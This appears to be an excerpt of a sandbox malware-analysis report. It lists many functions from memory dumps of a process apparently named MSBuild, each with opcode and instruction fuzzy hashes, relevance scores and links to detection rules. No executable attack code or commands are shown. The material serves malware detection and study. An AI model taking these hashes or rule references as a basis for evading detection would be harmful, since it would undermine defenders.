Download Yara Rule

Strings

LdrCreateEnclave, xrefs: 010710F7

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: LdrCreateEnclave
API String ID: 0-3262589265
Opcode ID: 810900399cee087de02f9911d99ee0bc7ff4a61e18494f282ffbe128e2b5a725
Instruction ID: bae6adcfb16e918c28be72110cffc4af883843a8f97f5e6032e1cb42d61e91e2
Opcode Fuzzy Hash: 810900399cee087de02f9911d99ee0bc7ff4a61e18494f282ffbe128e2b5a725
Instruction Fuzzy Hash: A22134B19183449FC320DF2AD805A9BFBE8FBD5B00F004A1FB9A09B350DBB59404CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0102E8F0 Relevance: 1.0, Instructions: 985COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41b8a3aaf423d9f70d434eeda23e8861a8db192580c53502bf658664cd48a088
Instruction ID: 560ca4875ff2f96ed27c0f95bcda580d794b0481d3f749a65ea1ad387a906e2e
Opcode Fuzzy Hash: 41b8a3aaf423d9f70d434eeda23e8861a8db192580c53502bf658664cd48a088
Instruction Fuzzy Hash: 20822472F102188BCB58CFADDC916DDB7F2EF88314B19812DE41AEB345DA34AC568B45

Uniqueness

Uniqueness Score: -1.00%

Function 0103516C Relevance: .8, Instructions: 785COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2b46b157426f3ff9ad434f0af6b5f17eec2610a397e0373a9183c2d67c2bcaf
Instruction ID: 8c6e07dbfd194d64116e424a6d78dd3bf95021bdee8bae99fe921dd3eb27a8e5
Opcode Fuzzy Hash: d2b46b157426f3ff9ad434f0af6b5f17eec2610a397e0373a9183c2d67c2bcaf
Instruction Fuzzy Hash: 6262A13290464AAFCF25CF08D8904AEFBB6BE95314B49C59CCCDA67625D371BA44CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0104739A Relevance: .7, Instructions: 705COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64206a06042fe47043dec934d62020f259fe7f582ae4431d12a16ff6ad91be17
Instruction ID: ff252efa1065f042eb2e219a4d467a39a78754b22a94138eb074ca6e481758a4
Opcode Fuzzy Hash: 64206a06042fe47043dec934d62020f259fe7f582ae4431d12a16ff6ad91be17
Instruction Fuzzy Hash: CB4290B5A006168FDB19CF59C4906BEBBF2FF88314B1485ADD596AB341DB34EC42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01045AA0 Relevance: .7, Instructions: 652COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
Instruction ID: eb35deafee5a148e98e8bfd7d17763f272ec6adeb0cd97324e3dbf259a8d3c2a
Opcode Fuzzy Hash: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
Instruction Fuzzy Hash: 89128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684

Uniqueness

Uniqueness Score: -1.00%

Function 0101B2C0 Relevance: .6, Instructions: 629COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60d954a79c951583c74d8a563cef540cef987650ba3629bcfdab089c483e765f
Instruction ID: 7555775435c9fb6827522a429334844932c91d537b472dc0187db8b904b6c835
Opcode Fuzzy Hash: 60d954a79c951583c74d8a563cef540cef987650ba3629bcfdab089c483e765f
Instruction Fuzzy Hash: 7332B271E00219DBDF14CFA8D880BEEBBB5FF58714F184169E885AB355E7399901CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01088158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9243b204518499654c9fb1bc86e91fcde7a8c64c39ba6aa13b48b6474857cf8d
Instruction ID: 6afe7efa9b9e17ffec2c9ecccbc3ed48600fbf10b2923bcef319603650f8773d
Opcode Fuzzy Hash: 9243b204518499654c9fb1bc86e91fcde7a8c64c39ba6aa13b48b6474857cf8d
Instruction Fuzzy Hash: 51426E75A142198FEB65DF69C841BADBBF5BF48300F54C09AE9C8EB242DB349981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01002840 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d8c20e7cd1c8d285e0e19a51955240acef62d9122455ae568e6c761175d28ad
Instruction ID: 3a26c9413ee2f5f7a047ff4c0aa6e999e39e1e5413fac870dc71556f0e40a057
Opcode Fuzzy Hash: 2d8c20e7cd1c8d285e0e19a51955240acef62d9122455ae568e6c761175d28ad
Instruction Fuzzy Hash: 1E32FF70A007598BEBA5CF69C8447BFBBF2BF84704F94415DD9C69B284DB36A842CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0109A118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da092056550bf48f499faa87db51908253b9e54914b194a44d2b9989e9a66a5a
Instruction ID: 0eef8ec0fc36b3899078ae87f8c89723aedd4bf54716481bd4a5456fe23433bb
Opcode Fuzzy Hash: da092056550bf48f499faa87db51908253b9e54914b194a44d2b9989e9a66a5a
Instruction Fuzzy Hash: E122AE70704661CBEF65CF2DC4A437ABBF1AF48304F088499E9D68B286D735D452EB60

Uniqueness

Uniqueness Score: -1.00%

Function 010B16CC Relevance: .6, Instructions: 571COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8418e19d3503fdf530a49bb37bc1cbac7975497f96b5a3bb6d80c0ac5b25c230
Instruction ID: 954fc8d2a49e0e842c94db4a62e7e32ea601670a26d2f964f6c70e223093d6fb
Opcode Fuzzy Hash: 8418e19d3503fdf530a49bb37bc1cbac7975497f96b5a3bb6d80c0ac5b25c230
Instruction Fuzzy Hash: FA22A035A002168FDB1ACF59D4E0AEEB7F2BF89304F2445ADD595DB345DB30A942CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0101FB80 Relevance: .6, Instructions: 559COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb06cf35772528dc265e8a4c6a362a0f47d5c501598c7ac06d4846747567ca24
Instruction ID: 8ed22f77a7694f047689123e0fa2f84677f9f64c0c4e36d4748d32a0a1512c6f
Opcode Fuzzy Hash: cb06cf35772528dc265e8a4c6a362a0f47d5c501598c7ac06d4846747567ca24
Instruction Fuzzy Hash: CC22087494020ADFDB11DFA8C884BEEB7F9FF44300F1485A9E9949B289E735D945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 010B1D5A Relevance: .6, Instructions: 559COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f79735ba9a4a1fcdf9de3f6b7e55b705f120ec2121de40a2acc9dc9dbb4b8507
Instruction ID: 461941722dfd196224ff5130b242dabdf4f8c95fffeeb676d4d9b675ccec169f
Opcode Fuzzy Hash: f79735ba9a4a1fcdf9de3f6b7e55b705f120ec2121de40a2acc9dc9dbb4b8507
Instruction Fuzzy Hash: 7A22AE356042129FD759CF18C4D0AAAB7E2FF99314F148AADE9D6CB391D730E842CB81

Uniqueness

Uniqueness Score: -1.00%

Function 01018DBF Relevance: .6, Instructions: 554COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6bb7d5bacca0f2a3de322448b91b52246b21f0d0dadf14f0559a9a870f88905
Instruction ID: e50a4a7141edc98250e992b0ac0b102ce175e0dfc18b8db7cb8091512a1df532
Opcode Fuzzy Hash: c6bb7d5bacca0f2a3de322448b91b52246b21f0d0dadf14f0559a9a870f88905
Instruction Fuzzy Hash: 1B224E70E0011ADBDB55CF99C4809BEFBF6BF44314B1580ABE9859B255E738DE81CB60

Uniqueness

Uniqueness Score: -1.00%

Function 010B2446 Relevance: .5, Instructions: 485COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33c9d82f0558582bcfabcd08a8d9da57ea0d5411877a1dfed6a666d1241ab9cd
Instruction ID: 89231c6a615107b7a7c247d48b49dcba7c7f236a6992e51209b12f9185ad92bf
Opcode Fuzzy Hash: 33c9d82f0558582bcfabcd08a8d9da57ea0d5411877a1dfed6a666d1241ab9cd
Instruction Fuzzy Hash: 2C02E0346006518BDB64CF2EC4D02F9BBF1AF89341B19859AE9D6DF282D335F852DB60

Uniqueness

Uniqueness Score: -1.00%

Function 010CB16B Relevance: .4, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a23592e5bf517511fda4ca5fc98830abaad0bd88c73ced0c8c7b617a017dbdf2
Instruction ID: 68d523cb5910c0d50cdf9b4be66cc758bbe57913c398082a479f8f6415f74a12
Opcode Fuzzy Hash: a23592e5bf517511fda4ca5fc98830abaad0bd88c73ced0c8c7b617a017dbdf2
Instruction Fuzzy Hash: BCF12872E006118BCB58CFADC89167EFFF6AF9865071941ADD896DB381E634EA01CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD83 Relevance: .4, Instructions: 435COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction ID: 14fa402de7e6223577ba8cbb9012898bea2f1445d5a1b0c53c0b2db273d56877
Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction Fuzzy Hash: FF026E73E547164FE720DE4ACDC4765B3A3EFC8301F5B81B8CA142B613CA39BA525A90

Uniqueness

Uniqueness Score: -1.00%

Function 010CA9A6 Relevance: .4, Instructions: 425COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3472a6889bdc2e7f2c93951488208362c55bfdcda85aff9815bb002167abbc0
Instruction ID: 4e2277f45b6c323ab411444a433b473bf8bed65d386c7e956497716ed88f588e
Opcode Fuzzy Hash: d3472a6889bdc2e7f2c93951488208362c55bfdcda85aff9815bb002167abbc0
Instruction Fuzzy Hash: 8CF1C572E0052A9BCB19CFA8C5A05BDFBF5AF4461071942ADD896EB381E734DE41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0101FDC0 Relevance: .4, Instructions: 390COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff900dfffa599b35f50ac4f2c75e4631ab7f008dcebba3309ba44a131c086689
Instruction ID: 7efb203edb0eeacfe9c7137e0b8ac07384f53f490b2c57b08cf241f381742b9e
Opcode Fuzzy Hash: ff900dfffa599b35f50ac4f2c75e4631ab7f008dcebba3309ba44a131c086689
Instruction Fuzzy Hash: 41F1D67090020ADFDB15DFA8C880BAEBBF5FF44304F1485A9E985DB28AE735DA45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FF65D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f44518bc532b55a7e383c4bf82dd2abfd04a50bacbdcd915279f1d414ecfcc10
Instruction ID: 4bece83fef408fc6997aad87082014df703182746e302767b8a26f24bdbb9b73
Opcode Fuzzy Hash: f44518bc532b55a7e383c4bf82dd2abfd04a50bacbdcd915279f1d414ecfcc10
Instruction Fuzzy Hash: B8E19F71908346CFC714DF28C090A6ABBE0FF99318F158A6DE995CB361DB31E905DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00FE8397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a5503eeb0ebd01b50441d9dc52526b161081b760103d2e7c1b5b709cf862abb
Instruction ID: 09cf1f8105325833c401543ec6b67f2eaf8832fc85b8dbddcf42bb5be3f2507f
Opcode Fuzzy Hash: 8a5503eeb0ebd01b50441d9dc52526b161081b760103d2e7c1b5b709cf862abb
Instruction Fuzzy Hash: 8AD126B2A002468BDB14EF26CC81BBAB7E5FF48354F144629F959DB291EB34D902DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0101C6E0 Relevance: .4, Instructions: 367COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43b73b059217dd25f688595c310775387b64843c19a887f38aec280fb2a39cd7
Instruction ID: d25050df0666e1128c9f8d5e1ee9338ddac1d09df6930203847f8722e1095634
Opcode Fuzzy Hash: 43b73b059217dd25f688595c310775387b64843c19a887f38aec280fb2a39cd7
Instruction Fuzzy Hash: 6CD16332E442198BFB69CE9CC6853BDBBF1FB44314F54409AD9C2A7289C778D941CB45

Uniqueness

Uniqueness Score: -1.00%

Function 010038E0 Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 651ef7e8ca48a9f722eabef2728d02178664c38050c4aa8ba7886d6c09a1bc31
Instruction ID: 385fb79ad1387c52591a9d9e86a0da0b7114c46b6656b637020453dea640860a
Opcode Fuzzy Hash: 651ef7e8ca48a9f722eabef2728d02178664c38050c4aa8ba7886d6c09a1bc31
Instruction Fuzzy Hash: 9AE1AF75A00205CFDB19CF59C880AAEBBF5FF98310F1481A9E995EB391D734EA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0100CFE0 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e80aeacd66ddc5e4b20ffd483aa00e46ca9821a9bef73a0c13f5f77a5437fd29
Instruction ID: 5c95d63c0e37a7bc35081dcb43b5993560a9814fc90fa8b600507f10cff1b2fb
Opcode Fuzzy Hash: e80aeacd66ddc5e4b20ffd483aa00e46ca9821a9bef73a0c13f5f77a5437fd29
Instruction Fuzzy Hash: 9BD1C330A003199FFB66CBD9C890BEAB7F1BB44314F0540E9D9899B281DB75AD85CF61

Uniqueness

Uniqueness Score: -1.00%

Function 01078243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction ID: 4f3fbd472057e7a8fb065934c8edc810bc4e8f4be5a3c5dd070ed830ffe2b2ea
Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction Fuzzy Hash: 37B17375F00605AFDB64DF59C948AABBBF9BF84304F10C45EAA8297790DA34E906CB14

Uniqueness

Uniqueness Score: -1.00%

Function 0100F460 Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a36387ef6dc37ab17598188b2a8c7388071fd5d93fe16afcf10f2b8f46f83a96
Instruction ID: 2ffe677b540e6d6643b86662b5287a6f0db87693a5cf0928db4ca5f040e3528d
Opcode Fuzzy Hash: a36387ef6dc37ab17598188b2a8c7388071fd5d93fe16afcf10f2b8f46f83a96
Instruction Fuzzy Hash: F6C1F271A012128BEB36CF2CC8D07BA77E1FB58B14F1941A9D9C29F2D5DB358941DB90

Uniqueness

Uniqueness Score: -1.00%

Function 01000535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: 1409008696540a019e49a9fe76e67c85c68c031a2749c53787bc31e3a7a63c04
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: 1CB10731600646AFEB66DBA8C850BFFBBF6AF84340F140195E5D6DB285EB30D941DB50

Uniqueness

Uniqueness Score: -1.00%

Function 010190DB Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 227f3c1117d999712346a5fb322c343a8beff95cb13c1abc88050dfa416b03fd
Instruction ID: 60d50d47ceaed4b5e2b4c0a1b0dc95943910352f300a84bfe5c176d10a719b4e
Opcode Fuzzy Hash: 227f3c1117d999712346a5fb322c343a8beff95cb13c1abc88050dfa416b03fd
Instruction Fuzzy Hash: BAA1717190061AAFEB22DFA4CC41FEF7BB9AF49754F010055FA80AB2A0D7759C11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FF83C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71fe7b6feab9364f317a4d4948f9ccee3f4f6fe4265f9a33f029f75c1285817b
Instruction ID: afaa098eda038697d010a4fe49c856b6a0b254612cb937eeed295e4977fda49e
Opcode Fuzzy Hash: 71fe7b6feab9364f317a4d4948f9ccee3f4f6fe4265f9a33f029f75c1285817b
Instruction Fuzzy Hash: E6C17974608345CFD760CF18C484BABBBE5BF88344F48495DE9898B2A1DB74E909CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00FEC427 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3650ee8daf244d84b25596150fa3a7c1cace8d3f32e941ec1496ca106bb89ae
Instruction ID: b547e26a92b66d69999eaf6a4490dc91382758109845193d0c84abae026429ab
Opcode Fuzzy Hash: c3650ee8daf244d84b25596150fa3a7c1cace8d3f32e941ec1496ca106bb89ae
Instruction Fuzzy Hash: C3B18370B002A58BDB74CF59C890BA9B3F5EF44710F1485E9E54AEB281DB34ED86DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0101E5E7 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32454bcb54ae1d080f658e9c050bda33d89a1b64c7733540845250361b0bf208
Instruction ID: fa55a470ca2999340c9bfb7711aa3f85e1271888709b2eae7d020ad2c2407e8b
Opcode Fuzzy Hash: 32454bcb54ae1d080f658e9c050bda33d89a1b64c7733540845250361b0bf208
Instruction Fuzzy Hash: C9A12531E0061A9FEB62DB58C948FAEBBE4BB04754F0501A5EEC0AB2D5D77C9D40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01030185 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c272d4529fa8396d26b20a39148f7fe67417b612353f9bf00b02d523eaf6c8c3
Instruction ID: ebfab87ad567a04a31862cdd2be6f755e7f73353695677b4638e646a08760eaf
Opcode Fuzzy Hash: c272d4529fa8396d26b20a39148f7fe67417b612353f9bf00b02d523eaf6c8c3
Instruction Fuzzy Hash: 08A1B170B027169FDB29CF69C590BAAB7E9FF84314F044069FA8597286DB34E901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 010C4500 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c91ea4c7d1cff72fee6831015b68d980c7f1b063805157ea11ab96f44ae37c4a
Instruction ID: dcf882422a22619f5d58d5756364059d5b3001f119e129d04fd3937ddaf83c64
Opcode Fuzzy Hash: c91ea4c7d1cff72fee6831015b68d980c7f1b063805157ea11ab96f44ae37c4a
Instruction Fuzzy Hash: 5CA1A772A04602AFD722DF18C990B6EBBE9FB58B04F45066CE589DB691C735E804CF91

Uniqueness

Uniqueness Score: -1.00%

Function 010760E0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d47f40062cb0b4781ea6f5a38c508dea06cc88f53976977d763476334ce4eb77
Instruction ID: 780f249ed4e234ab7bd6152e5f0763d493443d9119201ceddd28f4b2ac94d98c
Opcode Fuzzy Hash: d47f40062cb0b4781ea6f5a38c508dea06cc88f53976977d763476334ce4eb77
Instruction Fuzzy Hash: 1791D671D00A19AFEB15CF58D884BAEBFF5AF48310F158159E681EB341D736E900CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0100E3F0 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a96319f58b024221caeb298e62c622bad9827801b64be53819696247c4cca41
Instruction ID: 4653e27482c3edd927235550e04c54002a69986eb40e55cbf5208c5400284d73
Opcode Fuzzy Hash: 7a96319f58b024221caeb298e62c622bad9827801b64be53819696247c4cca41
Instruction Fuzzy Hash: 0E915531A00612CBFB66DB59C444BBEBBE1EF94714F0548A9EDC5AB2C0EB35D841CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FF1131 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb4bb1bf0bc64c8f0651a0a7ca0b2d709dd766fc5525a8a003d994a6d25d2e3d
Instruction ID: ecffa8cd40011bbeaa4219ccce7223264684be9da69c654cda7a5392907d1604
Opcode Fuzzy Hash: cb4bb1bf0bc64c8f0651a0a7ca0b2d709dd766fc5525a8a003d994a6d25d2e3d
Instruction Fuzzy Hash: DFB102B5A083418FD355CF28C580A6ABBE1BF88304F18496EF9D9DB352D731E945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00FF9486 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

